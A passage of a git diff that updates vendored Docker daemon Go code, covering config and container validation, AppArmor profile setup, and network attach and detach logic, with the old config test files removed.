config.LiveRestoreEnabled { - return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode") - } - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config_unix_test.go deleted file mode 100644 index 86c16f57ba..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_unix_test.go +++ /dev/null @@ -1,80 +0,0 @@ -// +build !windows - -package daemon - -import ( - "io/ioutil" - "testing" -) - -func TestDaemonConfigurationMerge(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - - f.Write([]byte(` - { - "debug": true, - "default-ulimits": { - "nofile": { - "Name": "nofile", - "Hard": 2048, - "Soft": 1024 - } - }, - "log-opts": { - "tag": "test_tag" - } - }`)) - - f.Close() - - c := &Config{ - CommonConfig: CommonConfig{ - AutoRestart: true, - LogConfig: LogConfig{ - Type: "syslog", - Config: map[string]string{"tag": "test"}, - }, - }, - } - - cc, err := MergeDaemonConfigurations(c, nil, configFile) - if err != nil { - t.Fatal(err) - } - if !cc.Debug { - t.Fatalf("expected %v, got %v\n", true, cc.Debug) - } - if !cc.AutoRestart { - t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) - } - if cc.LogConfig.Type != "syslog" { - t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) - } - - if configValue, OK := cc.LogConfig.Config["tag"]; !OK { - t.Fatal("expected syslog config attributes, got nil\n") - } else { - if configValue != "test_tag" { - t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) - } - } - - if cc.Ulimits == nil { - t.Fatal("expected default ulimit config, got nil\n") - } else { - if _, OK := cc.Ulimits["nofile"]; OK { - if cc.Ulimits["nofile"].Name != "nofile" || - cc.Ulimits["nofile"].Hard != 2048 || - cc.Ulimits["nofile"].Soft != 1024 { - t.Fatalf("expected default ulimit name, hard and soft are nofile, 2048, 1024, got %s, %d, %d\n", cc.Ulimits["nofile"].Name, cc.Ulimits["nofile"].Hard, cc.Ulimits["nofile"].Soft) - } - } else { - t.Fatal("expected default ulimit name nofile, got nil\n") - } - } -} diff --git a/vendor/github.com/docker/docker/daemon/config_windows.go b/vendor/github.com/docker/docker/daemon/config_windows.go deleted file mode 100644 index df59dcf302..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_windows.go +++ /dev/null @@ -1,71 +0,0 @@ -package daemon - -import ( - "os" - "path/filepath" - - "github.com/docker/docker/api/types" - "github.com/spf13/pflag" -) - -var ( - defaultPidFile string - defaultGraph = filepath.Join(os.Getenv("programdata"), "docker") -) - -// bridgeConfig stores all the bridge driver specific -// configuration. -type bridgeConfig struct { - commonBridgeConfig -} - -// Config defines the configuration of a docker daemon. -// These are the configuration settings that you pass -// to the docker daemon when you launch it with say: `docker daemon -e windows` -type Config struct { - CommonConfig - - // Fields below here are platform specific. (There are none presently - // for the Windows daemon.) -} - -// InstallFlags adds flags to the pflag.FlagSet to configure the daemon -func (config *Config) InstallFlags(flags *pflag.FlagSet) { - // First handle install flags which are consistent cross-platform - config.InstallCommonFlags(flags) - - // Then platform-specific install flags. - flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") - flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch") - flags.StringVarP(&config.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe") -} - -// GetRuntime returns the runtime path and arguments for a given -// runtime name -func (config *Config) GetRuntime(name string) *types.Runtime { - return nil -} - -// GetInitPath returns the configure docker-init path -func (config *Config) GetInitPath() string { - return "" -} - -// GetDefaultRuntimeName returns the current default runtime -func (config *Config) GetDefaultRuntimeName() string { - return stockRuntimeName -} - -// GetAllRuntimes returns a copy of the runtimes map -func (config *Config) GetAllRuntimes() map[string]types.Runtime { - return map[string]types.Runtime{} -} - -// GetExecRoot returns the user configured Exec-root -func (config *Config) GetExecRoot() string { - return "" -} - -func (config *Config) isSwarmCompatible() error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config_windows_test.go deleted file mode 100644 index 4a7b95c17d..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_windows_test.go +++ /dev/null @@ -1,59 +0,0 @@ -// +build windows - -package daemon - -import ( - "io/ioutil" - "testing" -) - -func TestDaemonConfigurationMerge(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - - f.Write([]byte(` - { - "debug": true, - "log-opts": { - "tag": "test_tag" - } - }`)) - - f.Close() - - c := &Config{ - CommonConfig: CommonConfig{ - AutoRestart: true, - LogConfig: LogConfig{ - Type: "syslog", - Config: map[string]string{"tag": "test"}, - }, - }, - } - - cc, err := MergeDaemonConfigurations(c, nil, configFile) - if err != nil { - t.Fatal(err) - } - if !cc.Debug { - t.Fatalf("expected %v, got %v\n", true, cc.Debug) - } - if !cc.AutoRestart { - t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) - } - if cc.LogConfig.Type != "syslog" { - t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) - } - - if configValue, OK := cc.LogConfig.Config["tag"]; !OK { - t.Fatal("expected syslog config attributes, got nil\n") - } else { - if configValue != "test_tag" { - t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) - } - } -} diff --git a/vendor/github.com/docker/docker/daemon/configs.go b/vendor/github.com/docker/docker/daemon/configs.go new file mode 100644 index 0000000000..4fd0d2272c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs.go @@ -0,0 +1,21 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/sirupsen/logrus" +) + +// SetContainerConfigReferences sets the container config references needed +func (daemon *Daemon) SetContainerConfigReferences(name string, refs []*swarmtypes.ConfigReference) error { + if !configsSupported() && len(refs) > 0 { + logrus.Warn("configs are not supported on this platform") + return nil + } + + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + c.ConfigReferences = append(c.ConfigReferences, refs...) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/configs_linux.go b/vendor/github.com/docker/docker/daemon/configs_linux.go new file mode 100644 index 0000000000..ceb666337c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs_linux.go @@ -0,0 +1,5 @@ +package daemon // import "github.com/docker/docker/daemon" + +func configsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/configs_unsupported.go b/vendor/github.com/docker/docker/daemon/configs_unsupported.go new file mode 100644 index 0000000000..ae6f14f54e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux,!windows + +package daemon // import "github.com/docker/docker/daemon" + +func configsSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/configs_windows.go b/vendor/github.com/docker/docker/daemon/configs_windows.go new file mode 100644 index 0000000000..ceb666337c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs_windows.go @@ -0,0 +1,5 @@ +package daemon // import "github.com/docker/docker/daemon" + +func configsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/container.go b/vendor/github.com/docker/docker/daemon/container.go index 2a44800098..c8e2053970 100644 --- a/vendor/github.com/docker/docker/daemon/container.go +++ b/vendor/github.com/docker/docker/daemon/container.go @@ -1,22 +1,29 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "os" + "path" "path/filepath" + "runtime" + "strings" "time" - "github.com/docker/docker/api/errors" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/container" "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/system" "github.com/docker/docker/pkg/truncindex" - "github.com/docker/docker/runconfig/opts" + "github.com/docker/docker/runconfig" + volumemounts "github.com/docker/docker/volume/mounts" "github.com/docker/go-connections/nat" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" ) // GetContainer looks for a container using the provided information, which could be @@ -28,7 +35,7 @@ import ( // If none of these searches succeed, an error is returned func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, error) { if len(prefixOrName) == 0 { - return nil, errors.NewBadRequestError(fmt.Errorf("No container name or ID supplied")) + return nil, errors.WithStack(invalidIdentifier(prefixOrName)) } if containerByID := daemon.containers.Get(prefixOrName); containerByID != nil { @@ -46,14 +53,23 @@ func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, e if indexError != nil { // When truncindex defines an error type, use that instead if indexError == truncindex.ErrNotExist { - err := fmt.Errorf("No such container: %s", prefixOrName) - return nil, errors.NewRequestNotFoundError(err) + return nil, containerNotFound(prefixOrName) } - return nil, indexError + return nil, errdefs.System(indexError) } return daemon.containers.Get(containerID), nil } +// checkContainer make sure the specified container validates the specified conditions +func (daemon *Daemon) checkContainer(container *container.Container, conditions ...func(*container.Container) error) error { + for _, condition := range conditions { + if err := condition(container); err != nil { + return err + } + } + return nil +} + // Exists returns a true if a container of the specified ID or name exists, // false otherwise. func (daemon *Daemon) Exists(id string) bool { @@ -79,6 +95,9 @@ func (daemon *Daemon) load(id string) (*container.Container, error) { if err := container.FromDisk(); err != nil { return nil, err } + if err := label.ReserveLabel(container.ProcessLabel); err != nil { + return nil, err + } if container.ID != id { return container, fmt.Errorf("Container %s is stored at %s", container.ID, id) @@ -96,13 +115,17 @@ func (daemon *Daemon) Register(c *container.Container) error { c.StreamConfig.NewNopInputPipe() } + // once in the memory store it is visible to other goroutines + // grab a Lock until it has been checkpointed to avoid races + c.Lock() + defer c.Unlock() + daemon.containers.Add(c.ID, c) daemon.idIndex.Add(c.ID) - - return nil + return c.CheckpointTo(daemon.containersReplica) } -func (daemon *Daemon) newContainer(name string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) { +func (daemon *Daemon) newContainer(name string, operatingSystem string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) { var ( id string err error @@ -117,7 +140,7 @@ func (daemon *Daemon) newContainer(name string, config *containertypes.Config, h if config.Hostname == "" { config.Hostname, err = os.Hostname() if err != nil { - return nil, err + return nil, errdefs.System(err) } } } else { @@ -135,8 +158,8 @@ func (daemon *Daemon) newContainer(name string, config *containertypes.Config, h base.ImageID = imgID base.NetworkSettings = &network.Settings{IsAnonymousEndpoint: noExplicitName} base.Name = name - base.Driver = daemon.GraphDriverName() - + base.Driver = daemon.imageService.GraphDriverForOS(operatingSystem) + base.OS = operatingSystem return base, err } @@ -149,7 +172,7 @@ func (daemon *Daemon) GetByName(name string) (*container.Container, error) { if name[0] != '/' { fullName = "/" + name } - id, err := daemon.nameIndex.Get(fullName) + id, err := daemon.containersReplica.Snapshot().GetID(fullName) if err != nil { return nil, fmt.Errorf("Could not find entity for %s", name) } @@ -183,7 +206,7 @@ func (daemon *Daemon) generateHostname(id string, config *containertypes.Config) func (daemon *Daemon) setSecurityOptions(container *container.Container, hostConfig *containertypes.HostConfig) error { container.Lock() defer container.Unlock() - return parseSecurityOpt(container, hostConfig) + return daemon.parseSecurityOpt(container, hostConfig) } func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *containertypes.HostConfig) error { @@ -201,25 +224,31 @@ func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig * return err } - // make sure links is not nil - // this ensures that on the next daemon restart we don't try to migrate from legacy sqlite links - if hostConfig.Links == nil { - hostConfig.Links = []string{} - } - + runconfig.SetDefaultNetModeIfBlank(hostConfig) container.HostConfig = hostConfig - return container.ToDisk() + return container.CheckpointTo(daemon.containersReplica) } // verifyContainerSettings performs validation of the hostconfig and config // structures. -func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { - +func (daemon *Daemon) verifyContainerSettings(platform string, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { // First perform verification of settings common across all platforms. if config != nil { if config.WorkingDir != "" { - config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics - if !system.IsAbs(config.WorkingDir) { + wdInvalid := false + if runtime.GOOS == platform { + config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics + if !system.IsAbs(config.WorkingDir) { + wdInvalid = true + } + } else { + // LCOW. Force Unix semantics + config.WorkingDir = strings.Replace(config.WorkingDir, string(os.PathSeparator), "/", -1) + if !path.IsAbs(config.WorkingDir) { + wdInvalid = true + } + } + if wdInvalid { return nil, fmt.Errorf("the working directory '%s' is invalid, it needs to be an absolute path", config.WorkingDir) } } @@ -237,6 +266,25 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon return nil, err } } + + // Validate the healthcheck params of Config + if config.Healthcheck != nil { + if config.Healthcheck.Interval != 0 && config.Healthcheck.Interval < containertypes.MinimumDuration { + return nil, errors.Errorf("Interval in Healthcheck cannot be less than %s", containertypes.MinimumDuration) + } + + if config.Healthcheck.Timeout != 0 && config.Healthcheck.Timeout < containertypes.MinimumDuration { + return nil, errors.Errorf("Timeout in Healthcheck cannot be less than %s", containertypes.MinimumDuration) + } + + if config.Healthcheck.Retries < 0 { + return nil, errors.Errorf("Retries in Healthcheck cannot be negative") + } + + if config.Healthcheck.StartPeriod != 0 && config.Healthcheck.StartPeriod < containertypes.MinimumDuration { + return nil, errors.Errorf("StartPeriod in Healthcheck cannot be less than %s", containertypes.MinimumDuration) + } + } } if hostConfig == nil { @@ -244,18 +292,32 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon } if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { - return nil, fmt.Errorf("can't create 'AutoRemove' container with restart policy") + return nil, errors.Errorf("can't create 'AutoRemove' container with restart policy") + } + + // Validate mounts; check if host directories still exist + parser := volumemounts.NewParser(platform) + for _, cfg := range hostConfig.Mounts { + if err := parser.ValidateMountConfig(&cfg); err != nil { + return nil, err + } + } + + for _, extraHost := range hostConfig.ExtraHosts { + if _, err := opts.ValidateExtraHost(extraHost); err != nil { + return nil, err + } } for port := range hostConfig.PortBindings { _, portStr := nat.SplitProtoPort(string(port)) if _, err := nat.ParsePort(portStr); err != nil { - return nil, fmt.Errorf("invalid port specification: %q", portStr) + return nil, errors.Errorf("invalid port specification: %q", portStr) } for _, pb := range hostConfig.PortBindings[port] { _, err := nat.NewPort(nat.SplitProtoPort(pb.HostPort)) if err != nil { - return nil, fmt.Errorf("invalid port specification: %q", pb.HostPort) + return nil, errors.Errorf("invalid port specification: %q", pb.HostPort) } } } @@ -265,18 +327,32 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon switch p.Name { case "always", "unless-stopped", "no": if p.MaximumRetryCount != 0 { - return nil, fmt.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name) + return nil, errors.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name) } case "on-failure": if p.MaximumRetryCount < 0 { - return nil, fmt.Errorf("maximum retry count cannot be negative") + return nil, errors.Errorf("maximum retry count cannot be negative") } case "": - // do nothing + // do nothing default: - return nil, fmt.Errorf("invalid restart policy '%s'", p.Name) + return nil, errors.Errorf("invalid restart policy '%s'", p.Name) + } + + if !hostConfig.Isolation.IsValid() { + return nil, errors.Errorf("invalid isolation '%s' on %s", hostConfig.Isolation, runtime.GOOS) } + var ( + err error + warnings []string + ) // Now do platform-specific verification - return verifyPlatformContainerSettings(daemon, hostConfig, config, update) + if warnings, err = verifyPlatformContainerSettings(daemon, hostConfig, config, update); err != nil { + return warnings, err + } + if hostConfig.NetworkMode.IsHost() && len(hostConfig.PortBindings) > 0 { + warnings = append(warnings, "Published ports are discarded when using host network mode") + } + return warnings, err } diff --git a/vendor/github.com/docker/docker/daemon/container_linux.go b/vendor/github.com/docker/docker/daemon/container_linux.go new file mode 100644 index 0000000000..e6f5bf2ccc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_linux.go @@ -0,0 +1,30 @@ +//+build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" +) + +func (daemon *Daemon) saveApparmorConfig(container *container.Container) error { + container.AppArmorProfile = "" //we don't care about the previous value. + + if !daemon.apparmorEnabled { + return nil // if apparmor is disabled there is nothing to do here. + } + + if err := parseSecurityOpt(container, container.HostConfig); err != nil { + return errdefs.InvalidParameter(err) + } + + if !container.HostConfig.Privileged { + if container.AppArmorProfile == "" { + container.AppArmorProfile = defaultApparmorProfile + } + + } else { + container.AppArmorProfile = "unconfined" + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations.go b/vendor/github.com/docker/docker/daemon/container_operations.go index c30250622d..df84f88f3f 100644 --- a/vendor/github.com/docker/docker/daemon/container_operations.go +++ b/vendor/github.com/docker/docker/daemon/container_operations.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "errors" @@ -10,34 +10,47 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" - derr "github.com/docker/docker/api/errors" containertypes "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/container" "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/runconfig" "github.com/docker/go-connections/nat" "github.com/docker/libnetwork" + netconst "github.com/docker/libnetwork/datastore" "github.com/docker/libnetwork/netlabel" "github.com/docker/libnetwork/options" "github.com/docker/libnetwork/types" + "github.com/sirupsen/logrus" ) var ( // ErrRootFSReadOnly is returned when a container // rootfs is marked readonly. ErrRootFSReadOnly = errors.New("container rootfs is marked read-only") - getPortMapInfo = container.GetSandboxPortMapInfo + getPortMapInfo = getSandboxPortMapInfo ) +func (daemon *Daemon) getDNSSearchSettings(container *container.Container) []string { + if len(container.HostConfig.DNSSearch) > 0 { + return container.HostConfig.DNSSearch + } + + if len(daemon.configStore.DNSSearch) > 0 { + return daemon.configStore.DNSSearch + } + + return nil +} + func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]libnetwork.SandboxOption, error) { var ( sboxOptions []libnetwork.SandboxOption err error dns []string - dnsSearch []string dnsOptions []string bindings = make(nat.PortMap) pbList []types.PortBinding @@ -78,11 +91,7 @@ func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]lib sboxOptions = append(sboxOptions, libnetwork.OptionDNS(d)) } - if len(container.HostConfig.DNSSearch) > 0 { - dnsSearch = container.HostConfig.DNSSearch - } else if len(daemon.configStore.DNSSearch) > 0 { - dnsSearch = daemon.configStore.DNSSearch - } + dnsSearch := daemon.getDNSSearchSettings(container) for _, ds := range dnsSearch { sboxOptions = append(sboxOptions, libnetwork.OptionDNSSearch(ds)) @@ -111,6 +120,9 @@ func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]lib for _, extraHost := range container.HostConfig.ExtraHosts { // allow IPv6 addresses in extra hosts; only split on first ":" + if _, err := opts.ValidateExtraHost(extraHost); err != nil { + return nil, err + } parts := strings.SplitN(extraHost, ":", 2) sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(parts[0], parts[1])) } @@ -241,13 +253,20 @@ func (daemon *Daemon) updateNetworkSettings(container *container.Container, n li return runconfig.ErrConflictHostNetwork } - for s := range container.NetworkSettings.Networks { - sn, err := daemon.FindNetwork(s) + for s, v := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(getNetworkID(s, v.EndpointSettings)) if err != nil { continue } if sn.Name() == n.Name() { + // If the network scope is swarm, then this + // is an attachable network, which may not + // be locally available previously. + // So always update. + if n.Info().Scope() == netconst.SwarmScope { + continue + } // Avoid duplicate config return nil } @@ -261,22 +280,20 @@ func (daemon *Daemon) updateNetworkSettings(container *container.Container, n li } } - if _, ok := container.NetworkSettings.Networks[n.Name()]; !ok { - container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ - EndpointSettings: endpointConfig, - } + container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, } return nil } func (daemon *Daemon) updateEndpointNetworkSettings(container *container.Container, n libnetwork.Network, ep libnetwork.Endpoint) error { - if err := container.BuildEndpointInfo(n, ep); err != nil { + if err := buildEndpointInfo(container.NetworkSettings, n, ep); err != nil { return err } if container.HostConfig.NetworkMode == runconfig.DefaultDaemonNetworkMode() { - container.NetworkSettings.Bridge = daemon.configStore.bridgeConfig.Iface + container.NetworkSettings.Bridge = daemon.configStore.BridgeConfig.Iface } return nil @@ -298,8 +315,8 @@ func (daemon *Daemon) updateNetwork(container *container.Container) error { // Find if container is connected to the default bridge network var n libnetwork.Network - for name := range container.NetworkSettings.Networks { - sn, err := daemon.FindNetwork(name) + for name, v := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(getNetworkID(name, v.EndpointSettings)) if err != nil { continue } @@ -329,7 +346,9 @@ func (daemon *Daemon) updateNetwork(container *container.Container) error { } func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrName string, epConfig *networktypes.EndpointSettings) (libnetwork.Network, *networktypes.NetworkingConfig, error) { - n, err := daemon.FindNetwork(idOrName) + id := getNetworkID(idOrName, epConfig) + + n, err := daemon.FindNetwork(id) if err != nil { // We should always be able to find the network for a // managed container. @@ -362,27 +381,32 @@ func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrN retryCount int ) + if n == nil && daemon.attachableNetworkLock != nil { + daemon.attachableNetworkLock.Lock(id) + defer daemon.attachableNetworkLock.Unlock(id) + } + for { // In all other cases, attempt to attach to the network to // trigger attachment in the swarm cluster manager. if daemon.clusterProvider != nil { var err error - config, err = daemon.clusterProvider.AttachNetwork(idOrName, container.ID, addresses) + config, err = daemon.clusterProvider.AttachNetwork(id, container.ID, addresses) if err != nil { return nil, nil, err } } - n, err = daemon.FindNetwork(idOrName) + n, err = daemon.FindNetwork(id) if err != nil { if daemon.clusterProvider != nil { - if err := daemon.clusterProvider.DetachNetwork(idOrName, container.ID); err != nil { + if err := daemon.clusterProvider.DetachNetwork(id, container.ID); err != nil { logrus.Warnf("Could not rollback attachment for container %s to network %s: %v", container.ID, idOrName, err) } } // Retry network attach again if we failed to - // find the network after successfull + // find the network after successful // attachment because the only reason that // would happen is if some other container // attached to the swarm scope network went down @@ -410,7 +434,7 @@ func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrN return n, config, nil } -// updateContainerNetworkSettings update the network settings +// updateContainerNetworkSettings updates the network settings func (daemon *Daemon) updateContainerNetworkSettings(container *container.Container, endpointsConfig map[string]*networktypes.EndpointSettings) { var n libnetwork.Network @@ -495,12 +519,13 @@ func (daemon *Daemon) allocateNetwork(container *container.Container) error { logrus.Errorf("failed to cleanup up stale network sandbox for container %s", container.ID) } + if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() { + return nil + } + updateSettings := false - if len(container.NetworkSettings.Networks) == 0 { - if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() { - return nil - } + if len(container.NetworkSettings.Networks) == 0 { daemon.updateContainerNetworkSettings(container, nil) updateSettings = true } @@ -535,7 +560,29 @@ func (daemon *Daemon) allocateNetwork(container *container.Container) error { } } - if err := container.WriteHostConfig(); err != nil { + // If the container is not to be connected to any network, + // create its network sandbox now if not present + if len(networks) == 0 { + if nil == daemon.getNetworkSandbox(container) { + options, err := daemon.buildSandboxOptions(container) + if err != nil { + return err + } + sb, err := daemon.netController.NewSandbox(container.ID, options...) + if err != nil { + return err + } + updateSandboxNetworkSettings(container, sb) + defer func() { + if err != nil { + sb.Delete() + } + }() + } + + } + + if _, err := container.WriteHostConfig(); err != nil { return err } networkActions.WithValues("allocate").UpdateSince(start) @@ -693,7 +740,7 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName controller := daemon.netController sb := daemon.getNetworkSandbox(container) - createOptions, err := container.BuildCreateEndpointOptions(n, endpointConfig, sb, daemon.configStore.DNS) + createOptions, err := buildCreateEndpointOptions(container, n, endpointConfig, sb, daemon.configStore.DNS) if err != nil { return err } @@ -732,10 +779,10 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName return err } - container.UpdateSandboxNetworkSettings(sb) + updateSandboxNetworkSettings(container, sb) } - joinOptions, err := container.BuildJoinOptions(n) + joinOptions, err := buildJoinOptions(container.NetworkSettings, n) if err != nil { return err } @@ -751,7 +798,7 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName } } - if err := container.UpdateJoinInfo(n, ep); err != nil { + if err := updateJoinInfo(container.NetworkSettings, n, ep); err != nil { return fmt.Errorf("Updating join info failed: %v", err) } @@ -762,6 +809,37 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName return nil } +func updateJoinInfo(networkSettings *network.Settings, n libnetwork.Network, ep libnetwork.Endpoint) error { // nolint: interfacer + if ep == nil { + return errors.New("invalid enppoint whhile building portmap info") + } + + if networkSettings == nil { + return errors.New("invalid network settings while building port map info") + } + + if len(networkSettings.Ports) == 0 { + pm, err := getEndpointPortMapInfo(ep) + if err != nil { + return err + } + networkSettings.Ports = pm + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + if epInfo.Gateway() != nil { + networkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String() + } + if epInfo.GatewayIPv6().To16() != nil { + networkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String() + } + return nil +} + // ForceEndpointDelete deletes an endpoint from a network forcefully func (daemon *Daemon) ForceEndpointDelete(name string, networkName string) error { n, err := daemon.FindNetwork(networkName) @@ -808,7 +886,7 @@ func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n li } if ep == nil { - return fmt.Errorf("container %s is not connected to the network", container.ID) + return fmt.Errorf("container %s is not connected to network %s", container.ID, n.Name()) } if err := ep.Leave(sbox); err != nil { @@ -823,16 +901,24 @@ func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n li delete(container.NetworkSettings.Networks, n.Name()) - if daemon.clusterProvider != nil && n.Info().Dynamic() && !container.Managed { - if err := daemon.clusterProvider.DetachNetwork(n.Name(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", n.Name(), err) - if err := daemon.clusterProvider.DetachNetwork(n.ID(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", n.ID(), err) + daemon.tryDetachContainerFromClusterNetwork(n, container) + + return nil +} + +func (daemon *Daemon) tryDetachContainerFromClusterNetwork(network libnetwork.Network, container *container.Container) { + if daemon.clusterProvider != nil && network.Info().Dynamic() && !container.Managed { + if err := daemon.clusterProvider.DetachNetwork(network.Name(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", network.Name(), err) + if err := daemon.clusterProvider.DetachNetwork(network.ID(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", network.ID(), err) } } } - - return nil + attributes := map[string]string{ + "container": container.ID, + } + daemon.LogNetworkEventWithAttributes(network, "disconnect", attributes) } func (daemon *Daemon) initializeNetworking(container *container.Container) error { @@ -844,7 +930,12 @@ func (daemon *Daemon) initializeNetworking(container *container.Container) error if err != nil { return err } - initializeNetworkingPaths(container, nc) + + err = daemon.initializeNetworkingPaths(container, nc) + if err != nil { + return err + } + container.Config.Hostname = nc.Config.Hostname container.Config.Domainname = nc.Config.Domainname return nil @@ -876,7 +967,7 @@ func (daemon *Daemon) getNetworkedContainer(containerID, connectedContainerID st } if !nc.IsRunning() { err := fmt.Errorf("cannot join network of a non running container: %s", connectedContainerID) - return nil, derr.NewRequestConflictError(err) + return nil, errdefs.Conflict(err) } if nc.IsRestarting() { return nil, errContainerIsRestarting(connectedContainerID) @@ -897,13 +988,13 @@ func (daemon *Daemon) releaseNetwork(container *container.Container) { settings := container.NetworkSettings.Networks container.NetworkSettings.Ports = nil - if sid == "" || len(settings) == 0 { + if sid == "" { return } var networks []libnetwork.Network for n, epSettings := range settings { - if nw, err := daemon.FindNetwork(n); err == nil { + if nw, err := daemon.FindNetwork(getNetworkID(n, epSettings.EndpointSettings)); err == nil { networks = append(networks, nw) } @@ -925,19 +1016,7 @@ func (daemon *Daemon) releaseNetwork(container *container.Container) { } for _, nw := range networks { - if daemon.clusterProvider != nil && nw.Info().Dynamic() && !container.Managed { - if err := daemon.clusterProvider.DetachNetwork(nw.Name(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", nw.Name(), err) - if err := daemon.clusterProvider.DetachNetwork(nw.ID(), container.ID); err != nil { - logrus.Warnf("error detaching from network %s: %v", nw.ID(), err) - } - } - } - - attributes := map[string]string{ - "container": container.ID, - } - daemon.LogNetworkEventWithAttributes(nw, "disconnect", attributes) + daemon.tryDetachContainerFromClusterNetwork(nw, container) } networkActions.WithValues("release").UpdateSince(start) } @@ -951,6 +1030,9 @@ func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName if endpointConfig == nil { endpointConfig = &networktypes.EndpointSettings{} } + container.Lock() + defer container.Unlock() + if !container.Running { if container.RemovalInProgress || container.Dead { return errRemovalContainer(container.ID) @@ -973,15 +1055,16 @@ func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName return err } } - if err := container.ToDiskLocking(); err != nil { - return fmt.Errorf("Error saving container to disk: %v", err) - } - return nil + + return container.CheckpointTo(daemon.containersReplica) } // DisconnectFromNetwork disconnects container from network n. func (daemon *Daemon) DisconnectFromNetwork(container 